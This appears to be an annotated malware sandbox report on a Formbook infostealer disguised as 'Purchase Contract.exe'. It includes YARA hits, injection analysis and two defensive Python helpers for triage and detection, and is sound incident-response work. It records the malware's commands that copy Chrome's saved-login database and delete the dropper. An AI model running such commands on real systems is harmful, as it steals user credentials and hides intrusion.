Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1BD40 NtSuspendThread,14_2_04E1BD40
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A540 NtDelayExecution,14_2_04E1A540
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A520 NtEnumerateKey,14_2_04E1A520
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A6D0 NtCreateProcessEx,14_2_04E1A6D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A6A0 NtCreateSection,14_2_04E1A6A0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A650 NtQueueApcThread,14_2_04E1A650
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A780 NtOpenDirectoryObject,14_2_04E1A780
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A750 NtCreateFile,14_2_04E1A750
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A720 NtResumeThread,14_2_04E1A720
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A700 NtProtectVirtualMemory,14_2_04E1A700
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A710 NtQuerySection,14_2_04E1A710
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1B0B0 NtGetContextThread,14_2_04E1B0B0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A800 NtSetValueKey,14_2_04E1A800
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A2F0 NtQueryInformationFile,14_2_04E1A2F0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A260 NtWriteFile,14_2_04E1A260
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A240 NtReadFile,14_2_04E1A240
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A220 NtWaitForSingleObject,14_2_04E1A220
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1BA30 NtSetContextThread,14_2_04E1BA30
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A3D0 NtCreateKey,14_2_04E1A3D0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A370 NtQueryInformationProcess,14_2_04E1A370
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A350 NtQueryValueKey,14_2_04E1A350
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_04E1A310 NtEnumerateValueKey,14_2_04E1A310
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36BC0 NtCreateFile,14_2_00C36BC0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36CF0 NtClose,14_2_00C36CF0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36C70 NtReadFile,14_2_00C36C70
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36DA0 NtAllocateVirtualMemory,14_2_00C36DA0
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36CEA NtClose,14_2_00C36CEA
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36C6A NtReadFile,14_2_00C36C6A
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 14_2_00C36D9C NtAllocateVirtualMemory,14_2_00C36D9C
Detected potential crypto function
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E048CB14_2_04E048CB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DEA08014_2_04DEA080
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E818B614_2_04E818B6
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E5A86014_2_04E5A860
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0107014_2_04E01070
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0E02014_2_04E0E020
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0002114_2_04E00021
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0981014_2_04E09810
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E9D01614_2_04E9D016
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA19E214_2_04EA19E2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E961DF14_2_04E961DF
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF81E014_2_04DF81E0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EAD9BE14_2_04EAD9BE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0618014_2_04E06180
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0594B14_2_04E0594B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF911014_2_04DF9110
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E2990614_2_04E29906
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0711014_2_04E07110
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA22DD14_2_04EA22DD
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF42B014_2_04DF42B0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EA1A9914_2_04EA1A99
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E04A5B14_2_04E04A5B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E0523D14_2_04E0523D
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E90A0214_2_04E90A02
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04EAE21414_2_04EAE214
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E063C214_2_04E063C2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DDEBE014_2_04DDEBE0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E04B9614_2_04E04B96
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DFFB4014_2_04DFFB40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04DF8B0014_2_04DF8B00
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C278EB14_2_00C278EB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C278F014_2_00C278F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C3AAE214_2_00C3AAE2
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Code function: String function: 0623DDE8 appears 50 times
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Code function: String function: 061EB0E0 appears 176 times
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Code function: String function: 06275110 appears 78 times
Source: C:\Windows\SysWOW64\control.exe, Code function: String function: 0450DDE8 appears 50 times
Source: C:\Windows\SysWOW64\control.exe, Code function: String function: 044BB0E0 appears 176 times
Source: C:\Windows\SysWOW64\control.exe, Code function: String function: 04545110 appears 78 times
Source: C:\Users\user\Desktop\Purchase Contract.exe, Code function: String function: 05DE5110 appears 50 times
Source: C:\Users\user\Desktop\Purchase Contract.exe, Code function: String function: 05D5B0E0 appears 176 times
Source: C:\Users\user\Desktop\Purchase Contract.exe, Code function: String function: 05DADDE8 appears 50 times
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04E65110 appears 78 times
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04E2DDE8 appears 50 times
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: String function: 04DDB0E0 appears 176 times
Note: the same three functions recur in all four processes at identical relative offsets (0623DDE8 - 061EB0E0 = 0450DDE8 - 044BB0E0 = 05DADDE8 - 05D5B0E0 = 04E2DDE8 - 04DDB0E0 = 0x52D08, and the xx5110 function sits 0x8A030 above the xxB0E0 one in every case). That is one unpacked image mapped at a different base in Purchase Contract.exe, control.exe, updategtmlg.exe and cmmon32.exe: the two SysWOW64 system binaries are executing the injected payload, not their own code.
Sample file is different than original file name gathered from version info
Source: Purchase Contract.exe, 00000000.00000002.821337419.0000000005FDF000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000000.765245970.0000000000AAA000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamepjzKElRfvzoP.exe4 vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000003.807640474.000000000125C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Purchase Contract.exe
Source: Purchase Contract.exe, 00000000.00000002.812742881.0000000005280000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Contract.exe
Source: Purchase Contract.exe, Binary or memory string: OriginalFilenameWindowsFormsApp2.exeF vs Purchase Contract.exe
Note: only the WindowsFormsApp2.exe entries come from the sample's own version resource (a default Visual Studio project name, so the dropper was built from an unrenamed C# template). ntdll.dll, clr.dll and mscorrc.dll are version resources of modules mapped into the process, and CONTROL.EXE is the image of the process the payload is injected into. pjzKElRfvzoP.exe is a further OriginalFilename found in a read-write region (0x3F45000) that also matches the Formbook rules below, which suggests it is the name of the embedded payload stage.
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\control.exe, Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Note: performed by the injected control.exe, together with the Chrome Login Data copy and the Outlook profile lookup listed below. Read as a group these are a browser and mail credential sweep, not a benign check for installed software.
Yara signature match
Matched rule (every source below): Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Matched rule (every source below): Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE
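Added example, not part of the Joe Sandbox report or of any vendor tooling: a small Python triage helper that turns the memory-dump names above into process, base address and page protection, so the hits can be read per process instead of per line. It assumes the dump-name layout <pid hex>.<stage>.<dump id>.<base hex>.<protection hex>.<type hex>.sdmp and that the protection field holds Win32 PAGE_* values; both are inferred from this report, not documented. The PID-to-image table is taken from the report's own prefixes (0 = Purchase Contract.exe, 2 = explorer.exe, 3 = control.exe, 13 and 15 = updategtmlg.exe, 14 and 16 = cmmon32.exe).

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

# Assumed dump-name layout (inferred from the report, not documented):
# <pid hex>.<stage hex>.<dump id>.<base address hex>.<protection hex>.<type hex>.sdmp
DUMP_NAME = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")

# Assumption: the protection field carries Win32 PAGE_* values.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# PID -> image, as the report's own prefixes (13_2_, 14_2_, 15.2., ...) resolve them.
PROCESS_NAMES = {0x0: "Purchase Contract.exe", 0x2: "explorer.exe", 0x3: "control.exe",
                 0xD: "updategtmlg.exe", 0xE: "cmmon32.exe",
                 0xF: "updategtmlg.exe", 0x10: "cmmon32.exe"}


class Region(NamedTuple):
    pid: int
    process: str
    base: int
    protection: int


def parse_dump_name(name: str) -> Region:
    """Split a Joe Sandbox dump name into pid / image / base / protection."""
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a dump name: {name}")
    pid, _stage, _dump_id, base, prot, _kind = m.groups()
    pid_i = int(pid, 16)
    return Region(pid_i, PROCESS_NAMES.get(pid_i, f"pid 0x{pid_i:X}"),
                  int(base, 16), int(prot, 16))


def is_rwx(r: Region) -> bool:
    """Executable and writable at once: where an unpacked payload normally lives."""
    return r.protection in EXECUTABLE and r.protection in WRITABLE


def triage(names: List[str]) -> Dict[str, List[str]]:
    """Group YARA hits by process and annotate each region with its protection."""
    out: Dict[str, List[str]] = defaultdict(list)
    for r in map(parse_dump_name, names):
        label = PAGE_PROTECTION.get(r.protection, f"0x{r.protection:X}")
        flag = "  <-- RWX region, consistent with an unpacked payload" if is_rwx(r) else ""
        out[f"{r.process} (pid 0x{r.pid:X})"].append(f"0x{r.base:08X} {label}{flag}")
    return dict(out)


# The MEMORY-type sources from the "Yara signature match" section of this report.
FORMBOOK_HITS = [
    "00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp",
    "0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp",
    "0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp",
    "00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp",
    "00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp",
    "0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp",
    "0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp",
    "0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp",
    "00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp",
    "00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp",
    "00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp",
    "0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp",
    "0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp",
    "0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp",
    "0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp",
    "00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for proc, regions in triage(FORMBOOK_HITS).items():
        print(proc)
        for line in regions:
            print("   ", line)
```

Twelve of the sixteen memory hits land in PAGE_EXECUTE_READWRITE regions and the other four (0x3F45000, 0xA0000, 0x4215000, 0x3395000) in read-write regions; all six processes carry at least one RWX hit, which is the injection footprint to scope an incident by.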
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: Purchase Contract.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: updategtmlg.exe.2.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification label
Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@14/10@28/7
Creates files inside the user directory
Source: C:\Users\user\Desktop\Purchase Contract.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Contract.exe.log
Note: the CLR writes a UsageLogs\<image>.log for any managed executable it runs; this entry corroborates the .NET entry point and is not a file dropped by the malware.
Creates mutexes
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_01
Note: these are the WIL error-reporting mutants conhost.exe creates for every console it hosts (here, the two cmd.exe instances); they are not malware mutexes and carry no detection value.
Creates temporary files
Source: C:\Windows\explorer.exe, File created: C:\Users\user\AppData\Local\Temp\S-zzxp
Note: created by the injected explorer.exe; the same S-zzxp name is used for the persistence directory C:\Program Files (x86)\S-zzxp that holds updategtmlg.exe.
PE file has an executable .text section and no other executable section
Source: Purchase Contract.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the .NET runtime (probably written in C#)
Source: C:\Users\user\Desktop\Purchase Contract.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\explorer.exe, File read: C:\Users\desktop.ini
Note: routine shell activity of explorer.exe, not attributable to the injected code.
Reads software policies
Source: C:\Users\user\Desktop\Purchase Contract.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Note: this is the Software Restriction Policies key the loader consults when a process starts; every executable triggers it.
Reads the hosts file
Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\control.exe, File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: Purchase Contract.exe, Virustotal: Detection: 32%
Source: Purchase Contract.exe, ReversingLabs: Detection: 45%
Spawns processes
Source: unknown, Process created: C:\Users\user\Desktop\Purchase Contract.exe 'C:\Users\user\Desktop\Purchase Contract.exe'
Source: unknown, Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Contract.exe'
Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe C:\Program Files (x86)\S-zzxp\updategtmlg.exe
Source: unknown, Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknown, Process created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe 'C:\Program Files (x86)\S-zzxp\updategtmlg.exe'
Source: unknown, Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe C:\Program Files (x86)\S-zzxp\updategtmlg.exe
Source: C:\Windows\explorer.exe, Process created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe 'C:\Program Files (x86)\S-zzxp\updategtmlg.exe'
Source: C:\Windows\SysWOW64\control.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Contract.exe'
Source: C:\Windows\SysWOW64\control.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Note: entries with source "unknown" are launches the sandbox could not attribute to a parent, which is what process creation from injected code looks like; the attributed lines below them tell the rest. Purchase Contract.exe is the .NET dropper. control.exe starts without arguments and runs the payload (same functions as the sample, see above), and it is control.exe, not the dropper, that deletes the original file through cmd.exe and copies Chrome's Login Data SQLite database to %TEMP%\DB1 (the /V switch only verifies the copy). The injected explorer.exe starts the persisted copy C:\Program Files (x86)\S-zzxp\updategtmlg.exe twice, and each run is followed by an argument-less cmmon32.exe, the image whose cmmon32.pdb strings turn up inside updategtmlg.exe's memory (debug symbols section below).
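Added example, not from the report: detection logic for the chain above, run over constructed Sysmon-style process-creation events. PIDs, parent attributions and quoting are made up (the report leaves several of these launches with an unknown parent). It keys on the two high-fidelity behaviours, a shell copy of a browser credential store and a shell deleting a binary that is itself a running process, and uses the argument-less SysWOW64 launch only as a corroborating signal, since on its own that pattern is too weak to alert on.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events modelled on the
# "Spawns processes" entries above; PIDs and parents are made up.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 1001, "ppid": 900,
     "image": r"C:\Users\user\Desktop\Purchase Contract.exe",
     "cmdline": r'"C:\Users\user\Desktop\Purchase Contract.exe"'},
    {"pid": 1002, "ppid": 900,
     "image": r"C:\Windows\SysWOW64\control.exe",
     "cmdline": r"C:\Windows\SysWOW64\control.exe"},
    {"pid": 1003, "ppid": 1002,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd /c del "C:\Users\user\Desktop\Purchase Contract.exe"'},
    {"pid": 1004, "ppid": 1002,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": (r'cmd /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data'
                 r'\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V')},
    {"pid": 1005, "ppid": 900,
     "image": r"C:\Program Files (x86)\S-zzxp\updategtmlg.exe",
     "cmdline": r"C:\Program Files (x86)\S-zzxp\updategtmlg.exe"},
    {"pid": 1006, "ppid": 1005,
     "image": r"C:\Windows\SysWOW64\cmmon32.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmmon32.exe"},
    # Benign control: Control Panel opened normally, 64-bit, with arguments.
    {"pid": 1007, "ppid": 900,
     "image": r"C:\Windows\System32\control.exe",
     "cmdline": r'"C:\Windows\System32\control.exe" /name Microsoft.System'},
]

# File names of browser credential stores (Chrome/Chromium and Firefox).
CRED_STORES = ("login data", "logins.json", "key4.db", "cookies")
# Target of a "del" command, quoted with " or ' or bare.
DEL_TARGET = re.compile(r'''\bdel\s+(?:"([^"]+)"|'([^']+)'|(\S+))''', re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _has_no_args(image: str, cmdline: str) -> bool:
    # A command line that is only the (possibly quoted) image path is argument-less.
    return cmdline.strip().strip('"').lower() == image.lower()


def detect(events: List[Dict[str, object]]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings for the three behaviours seen in the report."""
    images = {str(e["image"]).lower() for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        pid, image, cmd = int(e["pid"]), str(e["image"]), str(e["cmdline"])
        low = cmd.lower()
        if _basename(image) == "cmd.exe":
            # R1: shell copy of a browser credential database (high fidelity).
            if re.search(r"\bcopy\b", low) and any(s in low for s in CRED_STORES):
                findings.append(("browser_cred_copy", pid))
            # R2: shell deleting a binary that is itself a process in this batch,
            # i.e. dropper self-deletion (high fidelity).
            m = DEL_TARGET.search(cmd)
            if m:
                target = next(g for g in m.groups() if g).lower()
                if target in images:
                    findings.append(("self_delete", pid))
        # R3: 32-bit system binary started with no arguments at all. Low fidelity on
        # its own; it only counts together with R1/R2 (see is_formbook_like).
        if "\\syswow64\\" in image.lower() and _basename(image) != "cmd.exe" \
                and _has_no_args(image, cmd):
            findings.append(("hollow_candidate", pid))
    return findings


def is_formbook_like(findings: List[Tuple[str, int]]) -> bool:
    """Alert only when a high-fidelity rule and the hollowing signal co-occur."""
    rules = {r for r, _ in findings}
    return bool(rules & {"browser_cred_copy", "self_delete"}) and "hollow_candidate" in rules


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for rule, pid in hits:
        print(f"{rule:20} pid={pid}")
    print("formbook-like chain:", is_formbook_like(hits))
```

In production the batch passed to detect() would be one process tree (root plus descendants) rather than the whole host, so that R2 only fires when the deleted binary is an ancestor of the shell and R3 is correlated within the same tree.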
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\control.exe, File written: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini
Note: written by the injected control.exe into a randomised %APPDATA% directory (72R9-CPB), the same naming style as S-zzxp. Together with %TEMP%\DB1 and C:\Program Files (x86)\S-zzxp these are the paths to collect when scoping an infected host.
Uses Microsoft Silverlight
Source: C:\Users\user\Desktop\Purchase Contract.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Note: mscorrc.dll under Microsoft.NET\Framework\v4.0.30319 is the .NET Framework runtime resource library, not a Silverlight component; this signature is a mislabel of the same .NET usage noted above.
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\control.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Note: HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles is where Outlook 2013 keeps account profiles, including saved mail credentials as DPAPI-protected blobs. Opened by the injected control.exe alongside the Chrome and Firefox lookups, this is credential harvesting rather than an installed-software check. The analysis image runs Office 2016, whose profiles live under 16.0, so this particular query finds nothing here.
PE file contains a COM descriptor data directory
Source: Purchase Contract.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Note: the COM descriptor directory is the CLI header, so the file is a managed (.NET) assembly, consistent with the runtime entries above.
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Purchase Contract.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdb source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp
Source: Binary string: control.pdb source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp
